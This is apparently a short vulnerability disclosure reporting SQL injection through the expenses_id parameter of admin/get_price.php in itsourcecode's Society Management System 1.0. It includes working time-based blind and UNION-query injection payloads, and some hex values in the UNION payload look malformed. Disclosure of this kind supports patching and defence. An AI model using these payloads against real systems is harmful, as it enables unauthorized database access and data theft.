## Key Information ### Vendor - itsourcecode ### Product - Society Management System ### Version - 1.0 ### Download Source Code - [Download Link](https://itsourcecode.com/wp-content/uploads/2021/04/Society-Management-System-Project-In-PHP-Free-Download-Source-Code.zip) ### Description - **Vulnerability Type:** SQL Injection - **Location:** `admin/get_price.php` page - **Parameter:** `expenses_id` - **Issue:** Missing validation of `expenses_id` parameter which allows SQL injection. ### POC (Proof of Concept) #### Time-Based Blind Query - **Payload:** - `expenses_id=1' AND (SELECT 2866 FROM (SELECT(SLEEP(5)))fobU) AND 'jWhT'='jWhT` - This payload checks for time-based blind SQL injection. #### UNION Query - **Payload:** - `expenses_id=1' UNION ALL SELECT NULL,CONCAT(0x717a716a71,0x546849444175744a7649795244555796b4952674c65737452485a4,0x717a6a716b646a4843576576784af01f3665662d03940,0x717a716a71,0x546849444175744a7649795244555796b4952674c65737452485a4),NULL,NULL,NULL,NULL` - This payload is used to query and retrieve information from the enterprise database. ### URL - `http://192.168.17.24/admin/get_price.php`